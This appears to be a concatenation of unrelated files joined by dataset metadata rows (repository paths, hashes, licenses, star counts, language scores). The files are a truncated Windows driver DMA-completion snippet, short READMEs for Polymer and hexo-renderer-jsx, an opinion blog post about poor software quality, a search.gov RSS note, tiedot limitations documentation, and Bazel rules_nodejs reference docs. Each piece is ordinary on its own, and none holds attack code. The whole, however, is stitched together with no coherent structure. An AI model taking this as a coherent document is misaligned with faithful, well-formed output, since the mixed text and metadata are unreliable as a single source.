dteVA = (PDMA_TRANSFER_ELEMENT) devExt->ReadCommonBufferBase;
while(dteVA->DescPtr.LastElement == FALSE) {
length -= dteVA->TransferSize;
dteVA++;
}
length -= dteVA->TransferSize;
//
// Indicate that this DMA operation has completed.
//
hasTransitioned =
WdfDmaTransactionDmaCompletedWithLength(
dmaTransaction,
length,
&status
);
if (hasTransitioned) {
//
// Complete this DMA transaction.
//
devExt->CurrentReadDmaTransaction = NULL;
PLxReadRequestComplete(
dmaTransaction,
status
);
}
```
## -see-also
<a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactioncreate">WdfDmaTransactionCreate</a>
<a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiondmacompleted">WdfDmaTransactionDmaCompleted</a>
<a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/wdfdmatransaction/nf-wdfdmatransaction-wdfdmatransactiongetcurrentdmatransferlength">WdfDmaTransactionGetCurrentDmaTransferLength</a>
| 46.028986 | 729 | 0.763539 | eng_Latn | 0.472739 |
fa7975a7a580ec20623530c72ed57f572a516274 | 12 | md | Markdown | Data/RoadMaps Link Database/Polymer/README.md | rapport4/TutOverflow | f43bcc173ecc376e267c9222bea2fce516ff5e3b | [
"MIT"
] | 2 | 2018-11-27T11:10:51.000Z | 2018-11-27T12:35:13.000Z | Data/RoadMaps Link Database/Polymer/README.md | nightwarrior-xxx/TutOverflow | b0605056c89e1cdd9dc0276dd002508013b14d2a | [
"MIT"
] | 1 | 2018-11-28T05:10:56.000Z | 2018-11-28T05:10:56.000Z | Data/RoadMaps Link Database/Polymer/README.md | nightwarrior-xxx/TutOverflow | b0605056c89e1cdd9dc0276dd002508013b14d2a | [
"MIT"
] | 4 | 2018-11-27T12:35:12.000Z | 2019-02-01T08:05:46.000Z | ### POLYMER
| 6 | 11 | 0.583333 | kor_Hang | 0.424577 |
fa79c1e1b1c39abf9b56fa5c3f049b3eee44364d | 1,044 | md | Markdown | README.md | renbaoshuo/hexo-renderer-jsx | 45039e710112e0b71e8501c474e1a81c78d0b5d3 | [
"MIT"
] | null | null | null | README.md | renbaoshuo/hexo-renderer-jsx | 45039e710112e0b71e8501c474e1a81c78d0b5d3 | [
"MIT"
] | null | null | null | README.md | renbaoshuo/hexo-renderer-jsx | 45039e710112e0b71e8501c474e1a81c78d0b5d3 | [
"MIT"
] | null | null | null | # JSX Renderer for Hexo
[](https://baoshuo.ren)
[](https://github.com/renbaoshuo/hexo-renderer-jsx/releases)
[](https://github.com/renbaoshuo/hexo-renderer-jsx)
## Install
```bash
npm install hexo-renderer-jsx --save
# or use yarn:
# yarn add hexo-renderer-jsx
```
## Author
**hexo-renderer-jsx** © [Baoshuo](https://github.com/renbaoshuo), Released under the [MIT](./LICENSE) License.<br>
Authored and maintained by Baoshuo with help from [contributors](https://github.com/renbaoshuo/hexo-renderer-jsx/contributors).
> [Personal Website](https://baoshuo.ren) · [Blog](https://blog.baoshuo.ren) · GitHub [@renbaoshuo](https://github.com/renbaoshuo) · Twitter [@renbaoshuo](https://twitter.com/renbaoshuo)
| 49.714286 | 208 | 0.75 | yue_Hant | 0.190757 |
fa7aad06606b23e3ee47ab25b27dc530bd1af53c | 8,821 | md | Markdown | _posts/2017-02-23-state-of-our-industry.md | sourced-bvba/blog | 95dc7fd4d9e8e958b09b31d3dfa8b884445f3e13 | [
"MIT"
] | null | null | null | _posts/2017-02-23-state-of-our-industry.md | sourced-bvba/blog | 95dc7fd4d9e8e958b09b31d3dfa8b884445f3e13 | [
"MIT"
] | 2 | 2020-07-16T12:28:59.000Z | 2021-05-07T21:27:09.000Z | _posts/2017-02-23-state-of-our-industry.md | sourced-bvba/blog | 95dc7fd4d9e8e958b09b31d3dfa8b884445f3e13 | [
"MIT"
] | null | null | null | ---
layout: post
category : article
title: "The state of our industry"
comments: true
tags : [opinion]
---
Some weeks ago I fell down the stairs and broke my leg. This means I have plenty of time on my hands to read a lot of books and articles. Lately I read a lot of opinion articles on how software should be written and how some people are completely missing the ball.
So I'm left wondering the same question a lot of my colleagues are asking themselves:
> If we all know how good software should be written, why the hell is there still so much bad software being written?
See, to me, basic practices like good architectural design, clean code, DRY and SOLID aren't just words on a resume. It's the basis on which I evaluate all the work I do. Why? Because I've written some pretty bad code and I know the damage it can do. I've also seen the long term gains of really good code, why you need to look at the bigger picture and focus on delivering business value instead of using new features, technologies or approaches "just because we can".
Is it the fault of the schools? Are they teaching young programmers to code in a bad way just to get the theory in their heads and disregarding good industry practices and relying on the industry to show new kids how it should be done in the real world? Maybe. I've seen both sides of the coin on this one. I've seen youngsters that were able to hit the ground running. Those were mostly the guys that actually cared about becoming a good developer and dedicated time in order to become one. These guys are sponges: they are thirsty for knowledge and are willing to learn. But I've also seen freshly graduated students that basically need to unlearn everything they learned in school because what they saw might work on school projects but hopelessly fails in the real world, but they are convinced that they really are writing good software, because their teachers told them so (thank you for that...). They are stripped down to the basic knowledge and built back up. And if they happen to start at a company that isn't really committed to writing good quality software, they're basically screwed.
Which brings me to another possible guilty party: software companies. I'm not talking about the hipster names like Netflix, Spotify, Uber or any other billion dollar software company. I think it's a safe bet that over half of the regular IT companies aren't really concerned with writing great code. They ship out feature after feature, the faster the better. Their motto is:
> As long as the client is happy, who cares about the code?
These are the companies that are literally destroying our industry. These are the companies that manage to roll out high-visibility projects only to have them fail big time and have the results splashed out on tech blogs and if they're really unlucky, national newspapers and television. These companies are run from a financial perspective instead of a engineering perspective and they frankly don't care about quality. Imagine that the aeronautics industry upheld the same quality assurance as ours: you'd see a passenger jet fall out of the sky and you'd see crowds applauding if one ever managed to land safely, on time and with all passengers still in the plane! Seriously, what the hell is wrong with software companies?
And then we have suspect number 3, experienced developers. Our hubris knows no bounds. We go to conferences, see the newest framework, the newest approach in how you can write software for 10000 concurrent users or the next language on the block and we aimlessly adopt it, hoping to become one of the cool kids on the block. Here's the reality folks: not a lot of us are going to write software on the scale of Netflix. You probably don't need event sourcing. That runtime modularity framework that allows to you interchange tiny blocks of your system without downtime? YAGNI. We should go back and focus on the basics. Get the architectural design down to an art. We should pick technologies by their merit to deliver business value quicker. And if we see something that is slowing us down: cut it out and replace it.
Some time ago, Uncle Bob gave a talk at Devoxx. It was basically a kick in the ass to most developers that were present. He stated that a lot of the issues we have in our industry is actually our own fault. We're apparently okay with shipping shit to our customers, even if we know it's shit. We have an inability to say no. We give unrealistic estimates, both on the high and low end. So basically, we only have to blame ourselves, right? Well, no, but we are accountable for the mess we created.
But then there is the last suspect: clients. In this day and age, it's easy to become blasé about software. Why would you pay X for a piece of software if some schmuck can write it for you for a 10% of the price in Kerblechistan? And why wouldn't you then still go to a better company and demand insane discounts "because someone else can do it cheaper". Clients need to realize that their insistence on bargaining is actually destroying our industry, because it's such an accessible one. Not everyone can become a rocket engineer, building the next space shuttle. But a lot more think that becoming a software engineer that writes software to actually control that damn space shuttle is within their reach. You don't see rocket engineering courses online, but there are plenty software development courses available. And once you've "graduated", we're just all thrown together in a pile called "software developers".
Clients need to realize that trying to go for the cheap and fast option will cost them dearly and a whole lot more in the long run. It's like when you buy meat 75% off in the store. You're excited, you eat it and then you spend 6 weeks in hospital because of food poisoning. But you saved 75% right?
As long as price, and not quality, is the driving factor behind most IT decisions by customers, our industry will never change. Dear clients, we're really not in the business to screw you over. We really want to build great software that delivers tremendous business value to you. But if you pay peanuts, you're going to get monkeys throwing shit over the wall. It's that simple. Sure, good software is more expensive in the short run, but it's a one time cost. Bad software may look cheaper, but the costs in the long run are recurrent and in the end, it'll have cost you a lot more directly and indirectly. Bad software is like Chinese water torture: the drops will kill and drive you insane in the end.
Perhaps we need a rapture in our industry. We know high-profile failures don't do shit about the quality of our industry: I know of a project that was tanked by a company, only to have that same company get rewarded the contract to go at it again. Perhaps we need something at a scale of the Challenger or Columbia explosions. We all know that actually woke the space industry. But why does it need to come to this? We're all smart people, I hope? We all stood behind the agile manifesto when it came out and we all thought that it would change the face of the industry. But it only made a dent. Perhaps we need to get all the CEO's and CTO's of all the major software companies out there in a single room and ask them one basic question:
> WHAT THE HELL ARE YOU DOING?
Luckily there is a growing group of people that call themselves software craftsman and live up to the name. I don't consider myself one of them, but I sure as hell am aspiring to become one of them and I'm sure I'm going to get there. These are the dreamers, the guys that speak up (and in some cases, get fired or leave because of it). It's the group of people that say: "We refuse to write crap, even if you put a gun to our heads". But they are still the minority unfortunately. But I have hope. I have to. Humanity survived the Middle Ages. It's time for a Renaissance, the Age of Enlightenment, in our industy. But it's going to take all of us. And if you don't agree with me, quit your job and apply at a McDonalds. Please. Everybody can become a software developer by name. But only a small subset of those will ever become software craftsman. And it's the latter group that will save our industry and if we're lucky, make the former group the exception instead of the rule.
Time to say "no". No to unprofessionalism. No to shipping shit. No to making clients happy to present them an unrealistic future just to get the damn contract. No to settling for mediocre code "because it works". No to using technology that has zero added business value to the customer's use case, just to look cool to the outside world.
Let's do what what we were asked to do in the first place: write great software that doesn't bite us or our clients in the ass a couple of years down the road. | 220.525 | 1,098 | 0.787552 | eng_Latn | 0.999958 |
fa7ac353068be3b8f2cb242d04a3496b3a1ed3fd | 604 | md | Markdown | _includes/features/2014-03-13-rss-validation.md | afeld/search-gov-website | 8477786adc8ad4bf50cc70cc99a93a1ef38e0ac5 | [
"CC0-1.0"
] | 4 | 2020-03-17T13:44:00.000Z | 2021-11-03T15:14:47.000Z | _includes/features/2014-03-13-rss-validation.md | afeld/search-gov-website | 8477786adc8ad4bf50cc70cc99a93a1ef38e0ac5 | [
"CC0-1.0"
] | 24 | 2020-06-01T12:43:49.000Z | 2022-03-15T21:18:35.000Z | _includes/features/2014-03-13-rss-validation.md | afeld/search-gov-website | 8477786adc8ad4bf50cc70cc99a93a1ef38e0ac5 | [
"CC0-1.0"
] | 6 | 2020-04-23T00:12:27.000Z | 2022-03-11T16:13:27.000Z | We're working to improve the search experience for your [RSS feeds]({{ site.baseurl }}/manual/rss.html). Below are the first two improvements we made. Many more are on the way over the next few months.
* Searchers now see only unique URLs in the News GovBox. (We previously didn't dedupe URLs that belonged to multiple feeds.)
* Searchers now see only valid, resolving URLs. (We previously didn't revisit your older URLs to remove those with 404 errors.)
See, for example, the Most recent... results for a [search on corn on ERS.gov](https://search.ers.usda.gov/search?affiliate=ers&query=corn&m=true). | 100.666667 | 201 | 0.764901 | eng_Latn | 0.997978 |
874e9936804aeb48392ca560a0559f1ad885d1a2 | 2,408 | md | Markdown | doc/Dependencies-and-limitations.md | omeid/tiedot | 0ba4715f03bdede5f9d549176f96c94b1f51024e | [
"BSD-2-Clause"
] | null | null | null | doc/Dependencies-and-limitations.md | omeid/tiedot | 0ba4715f03bdede5f9d549176f96c94b1f51024e | [
"BSD-2-Clause"
] | null | null | null | doc/Dependencies-and-limitations.md | omeid/tiedot | 0ba4715f03bdede5f9d549176f96c94b1f51024e | [
"BSD-2-Clause"
] | null | null | null | ## Project dependency
tiedot has only one external package dependency, which is [go.rice], used by HTTP server for serving static assets in web control panel application. You need both git and mercurial (due to go.rice dependency) to build tiedot.
If you wish to remove all (well, the only) external dependencies, simply follow the instructions in `webcp/webcp.go`. You will lose the web control panel app by doing so.
## Hardware platform limit
By default, tiedot does not compile on 32-bit systems due to:
- Hash-table key-smear algorithm overflows 32-bit integer and prevents compilation.
- Data files are not split into 2GB chunks.
- Document ID generator involves using a random number source which produces platform integer (32 or 64 bits).
However, you may safely use tiedot on 32-bit systems ONLY IF there is a very small amount of data to be managed - several thousand of documents per collection (at maximum); to do so, please follow the instructions in `buildconstraint.go`.
## Data size limit
tiedot relies on memory mapped files for almost everything - just like many other NoSQL solutions.
For best performance, it is recommended (but not required) to have enough system memory to accommodate the entire data set.
Your operating system may have additional limit on the maximum size of a single memory mapped file.
## Document size limit
A document may not exceed 2MBytes, which means:
- When inserting a new document, its size may not exceed 1MBytes.
- When updating a document, the updated version may not exceed 2MBytes.
This limit is a compile time constant, it can be easily modified in `data/collection.go` (const `DOC_MAX_ROOM`).
## Runtime and scalability limit
Upon creating a new database, all collections and indexes are partitioned into `runtime.NumCPU()` (number of system CPUs) partitions, allowing concurrent document operations to be carried out on independent partitions. See [Concurrency and networking] for more details.
Go runtime uses `GOMAXPROCS` to limit number of OS threads available to a Go program, thus it will affect the scalability of tiedot. For best performance, `GOMAXPROCS` should be set to the number of system CPUs. This can be set via tiedot CLI parameter or environment variable `GOMAXPROCS`.
[go.rice]: https://github.com/GeertJohan/go.rice
[Concurrency and networking]: https://github.com/HouzuoGuo/tiedot/wiki/Concurrency-and-networking | 58.731707 | 290 | 0.789037 | eng_Latn | 0.996347 |
874f32b1acc24d2c2d117d85db6de7d7c1de9b22 | 24,306 | md | Markdown | docs/Built-ins.md | nickbehrens/rules_nodejs | ca4051e1f94d5089141f2a6a1daa0e775a0d09d1 | [
"Apache-2.0"
] | null | null | null | docs/Built-ins.md | nickbehrens/rules_nodejs | ca4051e1f94d5089141f2a6a1daa0e775a0d09d1 | [
"Apache-2.0"
] | null | null | null | docs/Built-ins.md | nickbehrens/rules_nodejs | ca4051e1f94d5089141f2a6a1daa0e775a0d09d1 | [
"Apache-2.0"
] | 1 | 2021-01-15T23:29:36.000Z | 2021-01-15T23:29:36.000Z | ---
title: Built-ins
layout: default
stylesheet: docs
---
# Built-in rules
These rules are available without any npm installation, via the `WORKSPACE` install of the `build_bazel_rules_nodejs` workspace. This is necessary to bootstrap Bazel to run the package manager to download other rules from NPM.
[name]: https://bazel.build/docs/build-ref.html#name
[label]: https://bazel.build/docs/build-ref.html#labels
[labels]: https://bazel.build/docs/build-ref.html#labels
## npm_package
### Usage
```
npm_package(name, deps, packages, rename_build_files, replace_with_version, replacements, srcs, vendor_external)
```
#### `name`
(*[name], mandatory*): A unique name for this target.
#### `deps`
(*[labels]*): Other targets which produce files that should be included in the package, such as `rollup_bundle`
#### `packages`
(*[labels]*): Other npm_package rules whose content is copied into this package.
#### `rename_build_files`
(*Boolean*): If set BUILD and BUILD.bazel files are prefixed with `_` in the npm package.
The default is True since npm packages that contain BUILD files don't work with
`yarn_install` and `npm_install` without a post-install step that deletes or renames them.
#### `replace_with_version`
(*String*): If set this value is replaced with the version stamp data.
See the section on stamping in the README.
#### `replacements`
(*<a href="https://bazel.build/docs/skylark/lib/dict.html">Dictionary: String -> String</a>*): Key-value pairs which are replaced in all the files while building the package.
#### `srcs`
(*[labels]*): Files inside this directory which are simply copied into the package.
#### `vendor_external`
(*List of strings*): External workspaces whose contents should be vendored into this workspace.
Avoids 'external/foo' path segments in the resulting package.
## rollup_bundle
### Usage
```
rollup_bundle(name, additional_entry_points, deps, enable_code_splitting, entry_point, global_name, globals, license_banner, node_modules, srcs)
```
#### `name`
(*[name], mandatory*): A unique name for this target.
#### `additional_entry_points`
(*List of strings*): Additional entry points of the application for code splitting, passed as the input to rollup.
These should be a path relative to the workspace root.
When additional_entry_points are specified, rollup_bundle
will split the bundle in multiple entry points and chunks.
There will be a main entry point chunk as well as entry point
chunks for each additional_entry_point. The file names
of these entry points will correspond to the file names
specified in entry_point and additional_entry_points.
There will also be one or more common chunks that are shared
between entry points named chunk-<HASH>.js. The number
of common chunks is variable depending on the code being
bundled.
Entry points and chunks will be outputted to folders:
- <label-name>_chunks_es2015 // es2015
- <label-name>_chunks // es5
- <label-name>_chunks_min // es5 minified
- <label-name>_chunks_min_debug // es5 minified debug
The following files will be outputted that contain the
SystemJS boilerplate to map the entry points to their file
names and load the main entry point:
flavors:
- <label-name>.es2015.js // es2015 with EcmaScript modules
- <label-name>.js // es5 syntax with CJS modules
- <label-name>.min.js // es5 minified
- <label-name>.min_debug.js // es5 minified debug
NOTE: additional_entry_points MUST be in the same folder or deeper than
the main entry_point for the SystemJS boilerplate/entry point to
be valid. For example, if the main entry_point is
`src/main` then all additional_entry_points must be under
`src/**` such as `src/bar` or `src/foo/bar`. Alternate
additional_entry_points configurations are valid but the
SystemJS boilerplate/entry point files will not be usable and
it is up to the user in these cases to handle the SystemJS
boilerplate manually.
It is sufficient to load one of these SystemJS boilerplate/entry point
files as a script in your HTML to load your application
#### `deps`
(*[labels]*): Other rules that produce JavaScript outputs, such as `ts_library`.
#### `enable_code_splitting`
(*Boolean*): If True rollup will automatically determine entry points from
the source code. The rollup output format will be 'esm' and rollup will
create entry points based on ES6 import statements. See
https://rollupjs.org/guide/en#code-splitting
Code splitting is always enabled when additional_entry_points is
non-empty.
All automatic entry points will be named chunk-<HASH>.js.
#### `entry_point`
(*[label], mandatory*): The starting point of the application, passed as the `--input` flag to rollup.
If the entry JavaScript file belongs to the same package (as the BUILD file),
you can simply reference it by its relative name to the package directory:
```
rollup_bundle(
name = "bundle",
entry_point = ":main.js",
)
```
You can specify the entry point as a typescript file so long as you also include
the ts_library target in deps:
```
ts_library(
name = "main",
srcs = ["main.ts"],
)
rollup_bundle(
name = "bundle",
deps = [":main"]
entry_point = ":main.ts",
)
```
The rule will use the corresponding `.js` output of the ts_library rule as the entry point.
If the entry point target is a rule, it should produce a single JavaScript entry file that will be passed to the nodejs_binary rule.
For example:
```
filegroup(
name = "entry_file",
srcs = ["main.js"],
)
rollup_bundle(
name = "bundle",
entry_point = ":entry_file",
)
```
#### `global_name`
(*String*): A name given to this package when referenced as a global variable.
This name appears in the bundle module incantation at the beginning of the file,
and governs the global symbol added to the global context (e.g. `window`) as a side-
effect of loading the UMD/IIFE JS bundle.
Rollup doc: "The variable name, representing your iife/umd bundle, by which other scripts on the same page can access it."
This is passed to the `output.name` setting in Rollup.
#### `globals`
(*<a href="https://bazel.build/docs/skylark/lib/dict.html">Dictionary: String -> String</a>*): A dict of symbols that reference external scripts.
The keys are variable names that appear in the program,
and the values are the symbol to reference at runtime in a global context (UMD bundles).
For example, a program referencing @angular/core should use ng.core
as the global reference, so Angular users should include the mapping
`"@angular/core":"ng.core"` in the globals.
#### `license_banner`
(*[label]*): A .txt file passed to the `banner` config option of rollup.
The contents of the file will be copied to the top of the resulting bundles.
Note that you can replace a version placeholder in the license file, by using
the special version `0.0.0-PLACEHOLDER`. See the section on stamping in the README.
#### `node_modules`
(*[label]*): Dependencies from npm that provide some modules that must be
resolved by rollup.
This attribute is DEPRECATED. As of version 0.13.0 the recommended approach
to npm dependencies is to use fine grained npm dependencies which are setup
with the `yarn_install` or `npm_install` rules. For example, in a rollup_bundle
target that used the `node_modules` attribute,
```
rollup_bundle(
name = "bundle",
...
node_modules = "//:node_modules",
)
```
which specifies all files within the `//:node_modules` filegroup
to be inputs to the `bundle`. Using fine grained npm dependencies,
`bundle` is defined with only the npm dependencies that are
needed:
```
rollup_bundle(
name = "bundle",
...
deps = [
"@npm//foo",
"@npm//bar",
...
],
)
```
In this case, only the `foo` and `bar` npm packages and their
transitive deps are includes as inputs to the `bundle` target
which reduces the time required to setup the runfiles for this
target (see https://github.com/bazelbuild/bazel/issues/5153).
The @npm external repository and the fine grained npm package
targets are setup using the `yarn_install` or `npm_install` rule
in your WORKSPACE file:
yarn_install(
name = "npm",
package_json = "//:package.json",
yarn_lock = "//:yarn.lock",
)
#### `srcs`
(*[labels]*): JavaScript source files from the workspace.
These can use ES2015 syntax and ES Modules (import/export)
## check_bazel_version
Verify the users Bazel version is at least the given one.
This should be called from the `WORKSPACE` file so that the build fails as
early as possible. For example:
```
# in WORKSPACE:
load("@build_bazel_rules_nodejs//:defs.bzl", "check_bazel_version")
check_bazel_version("0.26.0")
```
### Usage
```
check_bazel_version(minimum_bazel_version, message)
```
#### `minimum_bazel_version`
a string indicating the minimum version
#### `message`
optional string to print to your users, could be used to help them update
Defaults to `""`
## check_rules_nodejs_version
Verify that a minimum build_bazel_rules_nodejs is loaded a WORKSPACE.
This should be called from the `WORKSPACE` file so that the build fails as
early as possible. For example:
```
# in WORKSPACE:
load("@build_bazel_rules_nodejs//:package.bzl", "check_rules_nodejs_version")
check_rules_nodejs_version("0.11.2")
```
### Usage
```
check_rules_nodejs_version(minimum_version_string)
```
#### `minimum_version_string`
a string indicating the minimum version
## dummy_bzl_library
### Usage
```
dummy_bzl_library(name, kwargs)
```
#### `name`
#### `kwargs`
## history_server
This is a simple Bazel wrapper around the history-server npm package.
See https://www.npmjs.com/package/history-server
A typical frontend project is served by a specific server.
This one can support the Angular router.
### Usage
```
history_server(templated_args, kwargs)
```
#### `templated_args`
arguments to pass to every invocation of the binary
Defaults to `[]`
#### `kwargs`
passed through to the underlying nodejs_binary
## http_server
This is a simple Bazel wrapper around the http-server npm package.
See https://www.npmjs.com/package/http-server
A typical frontend project is served by a specific server.
For typical example applications, our needs are simple so we can just use http-server.
Real projects might need history-server (for router support) or even better a full-featured production server like express.
This rule uses a modified http-server to support serving Brotli-compressed files, which end with a .br extension.
This is equivalent to gzip-compression support.
See https://github.com/alexeagle/http-server/commits/master which points to a modified ecstatic library.
### Usage
```
http_server(templated_args, kwargs)
```
#### `templated_args`
arguments to pass to every invocation of the binary
Defaults to `[]`
#### `kwargs`
passed through to the underlying nodejs_binary
## jasmine_node_test
Runs tests in NodeJS using the Jasmine test runner.
To debug the test, see debugging notes in `nodejs_test`.
### Usage
```
jasmine_node_test(name, srcs, data, deps, expected_exit_code, tags, kwargs)
```
#### `name`
name of the resulting label
#### `srcs`
JavaScript source files containing Jasmine specs
Defaults to `[]`
#### `data`
Runtime dependencies which will be loaded while the test executes
Defaults to `[]`
#### `deps`
Other targets which produce JavaScript, such as ts_library
Defaults to `[]`
#### `expected_exit_code`
The expected exit code for the test.
Defaults to `0`
#### `tags`
bazel tags applied to test
Defaults to `[]`
#### `kwargs`
remaining arguments are passed to the test rule
## node_modules_filegroup
### Usage
```
node_modules_filegroup(packages, patterns, kwargs)
```
#### `packages`
#### `patterns`
Defaults to `[]`
#### `kwargs`
## node_repositories
To be run in user's WORKSPACE to install rules_nodejs dependencies.
This rule sets up node, npm, and yarn.
The versions of these tools can be specified in one of three ways:
- Normal Usage:
Specify no explicit versions. This will download and use the latest NodeJS & Yarn that were available when the
version of rules_nodejs you're using was released.
- Forced version(s):
You can select the version of NodeJS and/or Yarn to download & use by specifying it when you call node_repositories,
but you must use a value that matches a known version.
- Using a custom version:
You can pass in a custom list of NodeJS and/or Yarn repositories and URLs for node_resositories to use.
- Using a local version:
To avoid downloads, you can check in vendored copies of NodeJS and/or Yarn and set vendored_node and or vendored_yarn
to point to those before calling node_repositories.
This rule exposes the `@nodejs` workspace containing some rules the user can call later:
- Run node: `bazel run @nodejs//:node path/to/program.js`
- Install dependencies using npm: `bazel run @nodejs//:npm install`
- Install dependencies using yarn: `bazel run @nodejs//:yarn`
This rule also exposes the `@yarn` workspace for backwards compatibility:
- Alternately install dependencies using yarn: `bazel run @yarn//:yarn`
Note that the dependency installation scripts will run in each subpackage indicated by the `package_json` attribute.
This approach uses npm/yarn as the package manager. You could instead have Bazel act as the package manager, running the install behind the scenes.
See the `npm_install` and `yarn_install` rules, and the discussion in the README.
Example:
```
load("@build_bazel_rules_nodejs//:defs.bzl", "node_repositories")
node_repositories(package_json = ["//:package.json", "//subpkg:package.json"])
```
Running `bazel run @nodejs//:yarn` in this repo would create `/node_modules` and `/subpkg/node_modules`.
### Usage
```
node_repositories(package_json, node_version, yarn_version, vendored_node, vendored_yarn, node_repositories, yarn_repositories, node_urls, yarn_urls, preserve_symlinks)
```
#### `package_json`
a list of labels, which indicate the package.json files that will be installed
when you manually run the package manager, e.g. with
`bazel run @nodejs//:yarn` or `bazel run @nodejs//:npm install`.
If you use bazel-managed dependencies, you can omit this attribute.
Defaults to `[]`
#### `node_version`
optional; the specific version of NodeJS to install or, if
vendored_node is specified, the vendored version of node.
Defaults to `"10.16.0"`
#### `yarn_version`
optional; the specific version of Yarn to install.
Defaults to `"1.13.0"`
#### `vendored_node`
optional; the local path to a pre-installed NodeJS runtime.
If set then also set node_version to the version that of node that is vendored.
Bazel will automatically turn on features such as --preserve-symlinks-main if they
are supported by the node version being used.
Defaults to `None`
#### `vendored_yarn`
optional; the local path to a pre-installed yarn tool.
Defaults to `None`
#### `node_repositories`
optional; custom list of node repositories to use.
Defaults to `{"10.10.0-darwin_amd64": ("node-v10.10.0-darwin-x64.tar.gz", "node-v10.10.0-darwin-x64", "00b7a8426e076e9bf9d12ba2d571312e833fe962c70afafd10ad3682fdeeaa5e"), "10.10.0-linux_amd64": ("node-v10.10.0-linux-x64.tar.xz", "node-v10.10.0-linux-x64", "686d2c7b7698097e67bcd68edc3d6b5d28d81f62436c7cf9e7779d134ec262a9"), "10.10.0-windows_amd64": ("node-v10.10.0-win-x64.zip", "node-v10.10.0-win-x64", "70c46e6451798be9d052b700ce5dadccb75cf917f6bf0d6ed54344c856830cfb"), "10.13.0-darwin_amd64": ("node-v10.13.0-darwin-x64.tar.gz", "node-v10.13.0-darwin-x64", "815a5d18516934a3963ace9f0574f7d41f0c0ce9186a19be3d89e039e57598c5"), "10.13.0-linux_amd64": ("node-v10.13.0-linux-x64.tar.xz", "node-v10.13.0-linux-x64", "0dc6dba645550b66f8f00541a428c29da7c3cde32fb7eda2eb626a9db3bbf08d"), "10.13.0-windows_amd64": ("node-v10.13.0-win-x64.zip", "node-v10.13.0-win-x64", "eb09c9e9677f1919ec1ca78623c09b2a718ec5388b72b7662d5c41e5f628a52c"), "10.16.0-darwin_amd64": ("node-v10.16.0-darwin-x64.tar.gz", "node-v10.16.0-darwin-x64", "6c009df1b724026d84ae9a838c5b382662e30f6c5563a0995532f2bece39fa9c"), "10.16.0-linux_amd64": ("node-v10.16.0-linux-x64.tar.xz", "node-v10.16.0-linux-x64", "1827f5b99084740234de0c506f4dd2202a696ed60f76059696747c34339b9d48"), "10.16.0-windows_amd64": ("node-v10.16.0-win-x64.zip", "node-v10.16.0-win-x64", "aa22cb357f0fb54ccbc06b19b60e37eefea5d7dd9940912675d3ed988bf9a059"), "10.3.0-darwin_amd64": ("node-v10.3.0-darwin-x64.tar.gz", "node-v10.3.0-darwin-x64", "0bb5b7e3fe8cccda2abda958d1eb0408f1518a8b0cb58b75ade5d507cd5d6053"), "10.3.0-linux_amd64": ("node-v10.3.0-linux-x64.tar.xz", "node-v10.3.0-linux-x64", "eb3c3e2585494699716ad3197c8eedf4003d3f110829b30c5a0dc34414c47423"), "10.3.0-windows_amd64": ("node-v10.3.0-win-x64.zip", "node-v10.3.0-win-x64", "65d586afb087406a2800d8e51f664c88b26d510f077b85a3b177a1bb79f73677"), "10.9.0-darwin_amd64": ("node-v10.9.0-darwin-x64.tar.gz", "node-v10.9.0-darwin-x64", "3c4fe75dacfcc495a432a7ba2dec9045cff359af2a5d7d0429c84a424ef686fc"), "10.9.0-linux_amd64": ("node-v10.9.0-linux-x64.tar.xz", "node-v10.9.0-linux-x64", "c5acb8b7055ee0b6ac653dc4e458c5db45348cecc564b388f4ed1def84a329ff"), "10.9.0-windows_amd64": ("node-v10.9.0-win-x64.zip", "node-v10.9.0-win-x64", "6a75cdbb69d62ed242d6cbf0238a470bcbf628567ee339d4d098a5efcda2401e"), "8.11.1-darwin_amd64": ("node-v8.11.1-darwin-x64.tar.gz", "node-v8.11.1-darwin-x64", "5c7b05899ff56910a2b8180f139d48612f349ac2c5d20f08dbbeffbed9e3a089"), "8.11.1-linux_amd64": ("node-v8.11.1-linux-x64.tar.xz", "node-v8.11.1-linux-x64", "6617e245fa0f7fbe0e373e71d543fea878315324ab31dc64b4eba10e42d04c11"), "8.11.1-windows_amd64": ("node-v8.11.1-win-x64.zip", "node-v8.11.1-win-x64", "7d49b59c2b5d73a14c138e8a215d558a64a5241cd5035d9824f608e7bba097b1"), "8.12.0-darwin_amd64": ("node-v8.12.0-darwin-x64.tar.gz", "node-v8.12.0-darwin-x64", "ca131b84dfcf2b6f653a6521d31f7a108ad7d83f4d7e781945b2eca8172064aa"), "8.12.0-linux_amd64": ("node-v8.12.0-linux-x64.tar.xz", "node-v8.12.0-linux-x64", "29a20479cd1e3a03396a4e74a1784ccdd1cf2f96928b56f6ffa4c8dae40c88f2"), "8.12.0-windows_amd64": ("node-v8.12.0-win-x64.zip", "node-v8.12.0-win-x64", "9b22c9b23148b61ea0052826b3ac0255b8a3a542c125272b8f014f15bf11b091"), "8.9.1-darwin_amd64": ("node-v8.9.1-darwin-x64.tar.gz", "node-v8.9.1-darwin-x64", "05c992a6621d28d564b92bf3051a5dc0adf83839237c0d4653a8cdb8a1c73b94"), "8.9.1-linux_amd64": ("node-v8.9.1-linux-x64.tar.xz", "node-v8.9.1-linux-x64", "8be82805f7c1ab3e64d4569fb9a90ded2de78dd27cadbb91bad1bf975dae1e2d"), "8.9.1-windows_amd64": ("node-v8.9.1-win-x64.zip", "node-v8.9.1-win-x64", "db89c6e041da359561fbe7da075bb4f9881a0f7d3e98c203e83732cfb283fa4a"), "9.11.1-darwin_amd64": ("node-v9.11.1-darwin-x64.tar.gz", "node-v9.11.1-darwin-x64", "7b1fb394aa41a62b477e36df16644bd383cc9084808511f6cd318b835a06aac6"), "9.11.1-linux_amd64": ("node-v9.11.1-linux-x64.tar.xz", "node-v9.11.1-linux-x64", "4d27a95d5c2f1c8ef99118794c9c4903e63963418d3e16ca7576760cff39879b"), "9.11.1-windows_amd64": ("node-v9.11.1-win-x64.zip", "node-v9.11.1-win-x64", "0a3566d57ccb7fed95d18fc6c3bc1552a1b1e4753f9bc6c5d45e04f325e1ee53")}`
#### `yarn_repositories`
optional; custom list of yarn repositories to use.
